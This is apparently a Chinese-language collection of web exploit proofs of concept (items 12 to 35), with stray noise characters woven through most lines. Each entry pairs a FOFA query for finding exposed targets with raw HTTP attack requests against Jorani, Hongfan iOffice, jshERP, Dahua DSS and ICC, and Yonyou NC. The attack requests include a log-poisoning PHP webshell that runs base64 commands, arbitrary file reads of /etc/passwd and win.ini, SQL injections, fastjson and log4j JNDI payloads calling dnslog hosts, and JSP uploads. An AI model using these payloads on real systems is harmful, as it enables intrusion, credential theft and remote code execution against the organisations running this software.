0 h* q" w& d. P+ z. T3 z$ uHost: 127.0.0.1
2 E" q. v, E1 B; v+ y2 b O: Z( ePragma: no-cache
+ A. e$ r6 y- z1 Y; o# }" Y" B. cCache-Control: no-cache
# z, o$ i, B0 x/ NUpgrade-Insecure-Requests: 1
1 D- h6 U" K2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
; {+ e0 z; _. r9 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 O8 i8 U" M' c
Accept-Encoding: gzip, deflate }# k! r5 f6 Z! P8 Z! W
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
% k8 r. C" M/ S$ e. y3 k9 U I! PConnection: close& H4 h8 V: f- j6 i+ ^3 v
. z+ }: Z* Q: {% }5 J. ?7 F. ?
) ?# y& R$ H, U, s* J
12. Jorani < 1.0.2 远程命令执行7 ?) j3 b' ~$ m2 t8 r# I
FOFA:title="Jorani"
, ~: o$ [4 P% N- B. W$ P" t第一步先拿到cookie
7 Q$ @4 B, Y! O1 s+ h1 Z0 p5 DGET /session/login HTTP/1.19 D* C8 z& V3 m% C; b
Host: 192.168.190.308 w2 E' H3 T2 E6 Z! u- W# S
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% |: D% f8 O8 k- ?Connection: close
8 X/ N% F+ y" M" o; AAccept-Encoding: gzip
# Y$ E& p. ^0 F5 z: a) ?9 l d7 ^3 X( r7 o) x
) ?* C! t5 a) c" D- h9 S1 [
响应中csrf_cookie_jorani用于后续请求8 k8 C/ v- V: G1 _1 ?: p
HTTP/1.1 200 OK
+ }+ y' l& d2 ^1 k6 IConnection: close
% X, t" M' t& e( J3 WCache-Control: no-store, no-cache, must-revalidate' a) e! F/ d$ ^* I* F# \% L! |
Content-Type: text/html; charset=UTF-8) I _( [6 ^; C8 i2 L" Y- D
Date: Tue, 24 Oct 2023 09:34:28 GMT
4 s: M) O+ c4 CExpires: Thu, 19 Nov 1981 08:52:00 GMT
; W: o- M6 L& L. u% ?7 u1 ULast-Modified: Tue, 24 Oct 2023 09:34:28 GMT% t* Q! B* a: h# L% X8 M
Pragma: no-cache7 p% F0 C6 A( O
Server: Apache/2.4.54 (Debian)9 B# z4 n5 p. \( e) J+ S6 Q5 L
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/2 E& ~+ o8 j8 X
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly( i3 _0 ]: P' B% X0 H
Vary: Accept-Encoding
8 N1 r6 ]0 r7 q5 d f7 G7 \1 ~
+ J+ S3 J" n Y
! F. n6 P8 E$ Q( O9 pPOST请求,执行函数并进行base64编码; U" k" v( ~/ c6 i& o8 @
POST /session/login HTTP/1.1
* _' P! G# @. J5 k6 P. AHost: 192.168.190.30
0 D: n+ N U1 ]6 D" Y4 c: R5 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36/ U7 f8 S6 D' J* g' @& q. n3 X4 ?& b
Connection: close
! i/ }. D7 i& c0 @2 Z; R0 w- @: k1 rContent-Length: 252
2 A! J+ ~" a' ~6 `/ C: S- F FContent-Type: application/x-www-form-urlencoded C a: f) G0 G9 L
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
% B! t4 f- J- `" p5 B- ^3 |7 j0 k) Z* CAccept-Encoding: gzip+ Z3 y) p* y9 K! [4 ~" r7 F f
9 R$ P% P. h! ~* H9 ]% D- ?csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor1 B# b X5 B0 Z8 ]) M. o+ T
) |# a7 e$ F: s. n
- @" A/ Y5 i6 c
# T7 w c& |+ U5 i6 ]( ]& e- B; t向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
# B% i* n& \8 F7 a# MGET /pages/view/log-2023-10-24 HTTP/1.11 M$ u0 }/ K. ~, M4 I6 C9 r
Host: 192.168.190.30
# Y$ P2 M! v1 p" M/ w4 ]1 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 c( Q/ p0 U1 V e% t% {Connection: close: K8 F# \- Q& t5 V/ K- \, N
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r7 B1 S" i* T" i V o
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
+ I$ T* u, _/ t* m$ o7 J( oX-REQUESTED-WITH: XMLHttpRequest( c. a2 o- W) z1 h- j
Accept-Encoding: gzip0 I! p* p' [- D1 ?: a) W6 K- G" S9 b
4 t8 d8 N9 `, o% q
0 ^! |; i4 G5 g C13. 红帆iOffice ioFileDown任意文件读取2 Y. w, a9 ~: w! B* q1 k, ?
FOFA:app="红帆-ioffice"
, e1 J7 t0 j6 ]# `' |+ c7 ]# o- TGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
& @1 h, x9 w6 V) [7 x ]Host: x.x.x.x S5 Q& \ @; L( w5 K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 x. w* ~0 f! J% cConnection: close
/ Q- q( L1 K5 ?, e7 O: s8 v3 C4 UAccept: */*
$ ?9 d6 s9 i, z/ @Accept-Encoding: gzip
2 Y- \2 D9 N6 l7 j2 B1 ^9 @' Y- O6 g6 Z- ?
U" n7 Z/ [8 N9 U% D, Q5 X14. 华夏ERP(jshERP)敏感信息泄露
3 v. s3 \8 O# s0 w" J. Y1 i+ j6 GFOFA:body="jshERP-boot"
) d1 h4 K' [9 Z% R; Y& s+ |泄露内容包括用户名密码& X+ d- E- c5 M3 i4 y
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
/ j) A' v) d" J/ }/ t0 B1 K! DHost: x.x.x.x5 s d/ `5 s% w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36( O- |# u( S1 B4 F
Connection: close
. x( \ `' Q Y* H; ~/ [1 eAccept: */*
5 ` \' d0 f# DAccept-Language: en
7 R# {6 H6 w- L. j6 g; @6 F! S! KAccept-Encoding: gzip
% m& P! K2 K- ^- [) c8 Z
* r& C3 x' w: h, ~. I( J/ j- o( k+ a3 H
15. 华夏ERP getAllList信息泄露
|2 | k2 X# gCVE-2024-0490: X% F2 }# |; F, Y& k* o
FOFA:body="jshERP-boot"
6 _2 I$ q" e8 a: {5 g* W } |泄露内容包括用户名密码( T6 z( w- @$ P% J; Z4 N" m
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
4 U" l$ Y+ M% \/ HHost: 192.168.40.130:100
# r a# U- @6 e9 F! MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
, _' F" w! F0 p; `7 w, cConnection: close
" ^% d5 w; ^# l/ A) w/ v% p1 zAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
2 Z; x$ W7 p, X' k9 L$ \Accept-Language: en" k1 m9 m7 L( Z* I2 J# ]0 I
sec-ch-ua-platform: Windows3 V0 e- s1 |+ ~5 f; v+ H
Accept-Encoding: gzip
7 `" R3 Z- v4 _+ ^0 r7 }" B* M; m Y# C
+ `0 K* j# j8 }16. 红帆HFOffice医微云SQL注入 l- C3 T7 n+ N6 L* x9 y' J4 {
FOFA:title="HFOffice" j$ d! s" I6 ^5 Y* w9 n) {
poc中调用函数计算1234的md5值
) a% E' A" w& I8 x; v nGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1" z, i" Q# e$ Z$ K: j
Host: x.x.x.x1 ~# r; P2 t$ {- I- D8 }* ] Z$ Q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
: O* e" S; @* GConnection: close
a6 Q: @! H" S- m4 bAccept: */*5 \5 m! f: [- k3 k+ v! L6 i& g
Accept-Language: en
7 b8 o! `! t1 `- @) O, G1 y" iAccept-Encoding: gzip+ t; M0 e+ V- _" o/ x$ S' |. \
$ S& t6 J0 O6 v
' M* `: q. X3 w$ b( O/ P0 D
17. 大华 DSS itcBulletin SQL 注入
# y6 t8 t4 R. J2 GFOFA:app="dahua-DSS": |. |& k3 P; L4 u) g7 S1 d
POST /portal/services/itcBulletin?wsdl HTTP/1.1
. R6 x4 P- `( Q: X7 f: N% q7 OHost: x.x.x.x
6 j4 Z# l* D* d& a. L2 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! |# o3 Q p& O) |' sConnection: close
. R$ O; ~! M2 k' }* w5 Q7 ^- I' {Content-Length: 345+ w& r% ^& q4 Y) w% `$ B
Accept-Encoding: gzip
4 j0 C1 J" w, b# k! {5 X
; [( s& K1 U+ F* T3 z<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
. Q0 m+ K7 v0 s% _) `<s11:Body>
; m& { V: y/ t5 C7 D" J# ` <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
" O* W6 ^0 \# A& E$ D/ s$ @4 `: ? <netMarkings>
: ?2 X* }- i. g& o4 k/ C5 J2 f (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
8 A+ ^' F& R- j7 H& B </netMarkings>
1 x2 `6 J g6 ~. X5 ?& _6 S/ C </ns1:deleteBulletin>
" U s( O* i! y; S </s11:Body>4 q, p$ k- B* y- _1 ?* C$ v
</s11:Envelope>8 S) T" u6 }( Q0 t* S2 j5 j: Q
( @& k8 u' s6 b( I, w8 |' S- W) M4 t D0 w4 n R- S6 a
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; T5 R8 B% I! V- ~) H: P! j
FOFA:app="dahua-DSS"
7 X+ a" Y) p$ i P6 ]GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
1 M4 g* T) `9 M. K* t4 kHost: your-ip7 z+ d7 A1 i8 M J% T6 P1 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
o- w; d0 k/ F2 S3 `Accept-Encoding: gzip, deflate
2 I& ^4 I0 |; W. ~Accept: */*' B0 ^, z Q+ a$ f
Connection: keep-alive
* _% E/ F: }% d: Y& I" \- z+ J- K1 ]8 ~# R$ E; y M
/ T$ k$ [9 u( B, t, s* D, r
9 D) Y, L8 B3 G19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
* h, l1 R: D+ ~ p3 ?FOFA:app="dahua-DSS"% {1 O" x1 W' [& R/ F, B
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
# }9 \' l% G/ I2 p& gHost:- [; H1 D ^; Q* v
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
- B9 n7 r( m- n3 |Accept-Encoding: gzip, deflate9 M O% X' \' A/ w$ ~- G
Accept: */*
0 X$ n* }' t+ K$ k) vConnection: keep-alive: c, |/ Q! r+ u3 R& G' ?
$ S, N0 I- W9 N& O6 q9 [4 R$ z& v. q
% D* k4 Y6 t- V+ T+ j, j% `20. 大华ICC智能物联综合管理平台任意文件读取
5 a; c# e6 R3 ^. T! o3 Y, V/ iFOFA:body="*客户端会小于800*"& {, e. M7 m N& p% p5 R. F+ s4 y
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1) x. J" X( ~5 B
Host: x.x.x.x$ {5 k4 D5 z! q* C6 D* K
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 Q9 q+ U7 Q z E6 n" S* H8 B
Connection: close
4 f* u* d/ D6 L6 L1 D. }' HAccept: */*
: N! Q/ J. k* g+ ]4 QAccept-Language: en
/ z, y, ~- w3 z9 hAccept-Encoding: gzip
, v9 ~$ t# _! Q8 Q* x& M1 M
+ k7 }. [8 ?) n5 Z5 S9 H' t5 e0 T+ s1 O; [3 L
21. 大华ICC智能物联综合管理平台random远程代码执行, {: Z0 i1 z7 U: s
FOFA:icon_hash="-1935899595"$ v5 W+ ]# E! ?0 R
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, E4 f7 ]6 r! LHost: x.x.x.x
. j9 }9 x# j. H# i8 w6 F/ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" t' r! K: ?+ i9 g1 A) |Content-Length: 161
( L9 r4 ^3 e! f% l# K) B4 dAccept-Encoding: gzip& `, r( J U( k: L; r( g
Connection: close
1 p5 W" F! Q4 sContent-Type: application/json;charset=utf-87 V) X6 k9 m. l- J- H9 q
8 U% J& ^- A* ]3 A! D{
& |% n: j. \; E u"a":{ a4 W' g0 ~$ F0 m0 _
"@type":"com.alibaba.fastjson.JSONObject",
3 J: i0 H, }& y' o {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}/ t& ]7 w$ Q5 ]; d
}""% {- I( i8 _+ t r, t2 H
}, c: M6 a. J7 C4 m2 F3 x3 J$ K$ q
- n! x4 j! L9 D W- k4 X3 ]
0 o, j G6 x0 u2 M& T, k, b# s22. 大华ICC智能物联综合管理平台 log4j远程代码执行
9 b' k- \# b+ h, m# Y+ a* ` hFOFA:icon_hash="-1935899595"' a* h6 H8 ]0 l! h# H: Y
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
6 ]0 z) e3 x* ?( m4 k, ]Host: your-ip
% N' l3 C$ f8 ^6 p. h, C7 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% g( F5 [% A. V# Y2 N2 r* I
Content-Type: application/json;charset=utf-8
3 ~& y g. {7 [9 n
7 @2 U& p- d' b1 M{1 M( Q7 a$ @0 r" h' w: ^( ~- k6 ^
"loginName":"${jndi:ldap://dnslog}"
3 @4 A. Q7 Y! S* a; P5 i}6 Q6 M, K7 N5 C7 I" p! q" R$ V) Y
/ N6 B% e! A' \& _" R3 t
% g1 e# q* W i8 z9 J$ O4 L- I, i- r: s& |& l+ i
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 Y- ]& B h5 K" ^; p
FOFA:icon_hash="-1935899595"& j( n7 G( @ A7 Y' n/ ?1 s
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
4 v6 S( B4 T f3 MHost: your-ip
: F0 F7 e# t! l2 s! d7 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% u) H3 p4 K+ o _Content-Type: application/json;charset=utf-8' o' g. [. v) x8 A& O+ D" n
Accept-Encoding: gzip9 j" I$ A4 \+ K' v' i
Connection: close* Z% h( {" d& Q% G1 _7 B1 v# B/ _
' B8 I& Y' R$ C: w2 \" \{
7 |$ ?. Q9 f2 m: s "a":{# J- P9 `, s' v, E
"@type":"com.alibaba.fastjson.JSONObject",! R8 y/ v, K! {4 W4 _5 c
{"@type":"java.net.URL","val":"http://DNSLOG"}- s8 l4 P- o) m& Z$ p
}""
8 a' \7 [6 H/ q$ N1 w}
7 H$ p7 a' F5 E+ Z: y$ J6 m
; z% }5 e3 x: X7 c5 F. p
; H% O6 w9 n+ o- }+ k24. 用友NC 6.5 accept.jsp任意文件上传
( `8 S: O: R/ x' C1 O" m. Q6 ?- ^FOFA:icon_hash="1085941792"
6 R7 B) ]/ A$ \/ n$ H( T& M7 {POST /aim/equipmap/accept.jsp HTTP/1.1
+ R) k) d1 A) ^0 yHost: x.x.x.x
8 C2 @1 N& U# u5 C3 ?User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
6 V4 q: v. U2 I5 j$ U- z' Q( q1 LConnection: close
; ^6 S% b0 ]# p$ Q: Q+ |Content-Length: 449
5 a: d. H0 [3 ]: r3 ZAccept: */*2 p& D% q' X! [1 D1 k
Accept-Encoding: gzip
: d3 ]3 `1 I: ~5 n) _! y/ ZContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 k9 l |4 p5 Z9 V
# Y* D0 x" \7 ?6 l$ r! m3 Y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
5 Q7 W) D" O' ?, t# n: vContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
7 ^/ t' E. l. b" @4 P& rContent-Type: text/plain$ [6 l+ i/ o- K I8 k# H: O7 \
7 f: c& o7 A. U- v3 L0 q& s
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
5 A0 o9 [) F! s, C1 d5 p-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc9 M% x: G. b# h( [) Z k
Content-Disposition: form-data; name="fname"
) L7 C4 i# M8 @( h; t J" V# S! {( P, Y- o7 C0 e9 x
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp- V" w0 m7 N6 l- ~* l; _
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
6 k$ [- X% T0 b% u( ]1 [3 t+ I3 Q) M/ I# `' Z% _+ x% y G
k* t) X7 q4 `: U
25. 用友NC registerServlet JNDI 远程代码执行3 j/ |: ^' e# Y9 \& i- o
FOFA:app="用友-UFIDA-NC"
- ~! s3 x# D* Q- R. H7 d. vPOST /portal/registerServlet HTTP/1.1
" S) Y# B' z2 _" yHost: your-ip
0 a. E* Y( r7 |/ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ a. h1 Y& O3 J6 A' ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.99 Y' H. N) p5 d8 N. }5 J
Accept-Encoding: gzip, deflate
( S' v( U* h* i! y' QAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6& G3 \# \) ~$ P1 Z3 `
Content-Type: application/x-www-form-urlencoded
4 Y/ m H6 x7 w V6 B6 _
' N# ]3 c! m, a- n% `type=1&dsname=ldap://dnslog
F% j1 Y" Y# r2 w
% o6 Y* b( T6 g" o
% k( P; O k3 ? |- g
Z* J: L/ d3 A# l. _26. 用友NC linkVoucher SQL注入. ]8 u3 H: O% J5 `2 U/ I1 T
FOFA:app="用友-UFIDA-NC"! n; P' m- r6 _
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1- X4 u& o" _( E" C2 j
Host: your-ip& \- i) p% {7 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: V" D! Z* \! {9 n8 T% ~
Content-Type: application/x-www-form-urlencoded: u6 U& H0 T; o' j; f
Accept-Encoding: gzip, deflate e0 W& Q$ e6 ^% M) {& X/ `1 n- v
Accept: */*8 t: v& Z& S" P: T8 Y! b2 W
Connection: keep-alive7 f/ | C% L5 f
$ n( M3 k' w/ y( Y
8 }* w! I' v2 D c
27. 用友 NC showcontent SQL注入
$ J( m0 r" x) O4 G9 TFOFA:icon_hash="1085941792"4 H! i8 W& S a
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1! t, Y% ]' b7 g8 {/ I( U
Host: your-ip5 V2 ?- m E+ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 x7 B5 M' a. V1 g& a
Accept-Encoding: identity
! |5 e+ q" i$ r5 i* uConnection: close
* G7 @7 ^* K$ a! ?' t1 p4 ^Content-Type: text/xml; charset=utf-8# k* _% N2 X4 {' Y
. s+ M' ^- P, q3 u( i1 L
; C8 d, m7 J) J2 O
28. 用友NC grouptemplet 任意文件上传* [5 Z! |; x6 \- n- A
FOFA:icon_hash="1085941792"
! ^/ }) V! | j; T5 a# Y& F- jPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
* O: |8 r/ L* zHost: x.x.x.x7 a1 B3 _7 ^4 p; ]/ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 e J$ V3 {" W) WConnection: close2 a' f8 Y1 b% U7 G) f
Content-Length: 268' p% C$ G) E0 }7 I! E- |
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
' y& Y! G& @: {Accept-Encoding: gzip, S( I- M0 ~6 r# ]7 y e4 N5 R& i: `
1 h- ?) y, }; m. V# @& Q" N e
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ d! U* I# c5 q4 l: n
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"4 ^ Z! W# P7 Y! u" X8 F4 e( |
Content-Type: application/octet-stream- M- n8 A% j4 X+ x' }, ]
! y" x( x9 q# _9 U5 S
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>: ?! I1 | s; o# m9 k4 I5 K( [
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--4 [' M. F j" K
2 u, U4 W& D' Y1 ~6 J$ _2 P7 h& S7 N' O+ H% P ]
/uapim/static/pages/nc/head.jsp
. N" v* v7 p' _) y' \# l
' w! Z2 a) }" M- V29. 用友NC down/bill SQL注入5 m: m8 U3 i8 V" T* W/ E
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& X9 p+ J& q0 A: ?
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
. W- o4 ?: ?. R9 c9 THost: your-ip
! C( D8 L: H4 T }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 i8 _' M0 o4 k0 Q9 a6 R5 nContent-Type: application/x-www-form-urlencoded
3 C) {( e: x f3 x5 H& JAccept-Encoding: gzip, deflate, A5 u7 }' I0 T* v9 V
Accept: */*
, U( c6 p9 ?# M# N. E. v$ ^- YConnection: keep-alive0 J5 X) h6 w8 F: s+ @- A7 N* v4 w* {& o$ K
) z( i( Y& q, W$ s0 v8 L! s2 D7 Q" S K! ?4 z& Q% j8 z! R& L
30. 用友NC importPml SQL注入
. ~0 H1 `, J9 R" B- V7 jFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 }4 Q s3 r, x3 I
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
" c, Y* h( h6 C0 K4 s& {/ ^- OHost: your-ip
! E" R) K! f* e( s. qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V( f* D3 P- u8 W! T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.365 A4 ?4 A$ v& L& y
Connection: close y% b: b7 C! `& _2 {3 I9 d
7 d! w5 j9 J* _2 I------WebKitFormBoundaryH970hbttBhoCyj9V
( {$ X+ D- Y: e/ ~% J9 UContent-Disposition: form-data; name="Filedata"; filename="1.jpg"' b" M: O( {2 e. @$ C: W5 N
Content-Type: image/jpeg' Q; y& ?9 ?# W+ [5 P! J
------WebKitFormBoundaryH970hbttBhoCyj9V--6 C4 T0 Z! i6 m1 O- ?8 R/ }
+ T- m* U/ u2 p! O u
7 [$ Z, s( p" G( j0 @/ S31. 用友NC runStateServlet SQL注入
2 R3 z% m! m% o7 P e$ d: m$ Eversion<=6.5) W% e3 }) o- X, d6 P/ _8 q
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
& g$ c: d; n5 J/ b7 }, YGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( g' ?; ^% J- [2 g7 D' z4 z2 jHost: host
8 M7 `2 _; p: Y$ t* E5 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
# z P2 C' E$ w& e" |4 i7 }* uContent-Type: application/x-www-form-urlencoded
' q0 k; c6 }; v! V F7 K( j7 i. i8 I$ z1 a/ g8 L! [2 M7 E& c9 o0 S
4 U f5 X9 j3 ^" D! @32. 用友NC complainbilldetail SQL注入6 O, F1 P+ L/ o C7 Z; F# j7 L
version= NC633、NC65
7 J# ]/ P8 w' S- q) j7 o+ fFOFA:app="用友-UFIDA-NC"# `2 F5 x6 e+ O% t5 l
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.16 E0 ?9 m' F6 I
Host: your-ip% A# Y t7 ^. j8 Y* d9 C5 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 [7 ~7 e1 R( D$ ]7 R& c! T
Content-Type: application/x-www-form-urlencoded$ c M5 C$ Y3 k9 N- M. O( j
Accept-Encoding: gzip, deflate* Y. b1 j% ^' L8 w
Accept: */*
8 V( r- _. f! d+ hConnection: keep-alive
4 V* J. b$ B5 ~- q" e& C. S* t5 _0 G0 W i4 A
' m! M4 j* l5 R; i, L. Z& ]$ `
33. 用友NC downTax/download SQL注入# z9 M% z' v5 F; v6 l
version:NC6.5FOFA:app="用友-UFIDA-NC"
% `4 G$ b0 n5 [+ gGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1& J6 J4 R2 B: `0 F5 z" H
Host: your-ip( Y4 C, e. x: f( e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 ~# g9 I3 z9 `: l: l9 G2 m
Content-Type: application/x-www-form-urlencoded
+ J) q* Q1 F2 [: a& F$ TAccept-Encoding: gzip, deflate
. {- ^% T8 H" ?Accept: */*
% z0 c1 G% [5 gConnection: keep-alive% x" r- Z" P4 j. \2 a/ J( D
" h2 [7 }" U6 {: T$ h% ]
1 d, _, ~9 K" o, m0 Z34. 用友NC warningDetailInfo接口SQL注入" {% m- ]/ j- c0 C7 ^' x% R. i
FOFA:app="用友-UFIDA-NC": K- X) \/ G- I- [9 u# Y: V
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.19 |+ R! c# ?. z5 O- J8 i! e! r
Host: your-ip
. O1 z( f0 a% g) c4 f9 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 H5 b: }- k# ^4 z( |Content-Type: application/x-www-form-urlencoded
* }7 U k. J& J! l4 MAccept-Encoding: gzip, deflate6 y) s5 t9 H- A# q
Accept: */*" u1 }4 n' v- w$ {2 _
Connection: keep-alive. @( u$ ~/ G+ Y" j6 @( W
% H- X3 `& S0 Z5 J7 I8 ^/ ~
+ I0 U. _# T3 Y0 @35. 用友NC-Cloud importhttpscer任意文件上传, w( g4 V9 B7 h# ^
FOFA:app="用友-NC-Cloud"
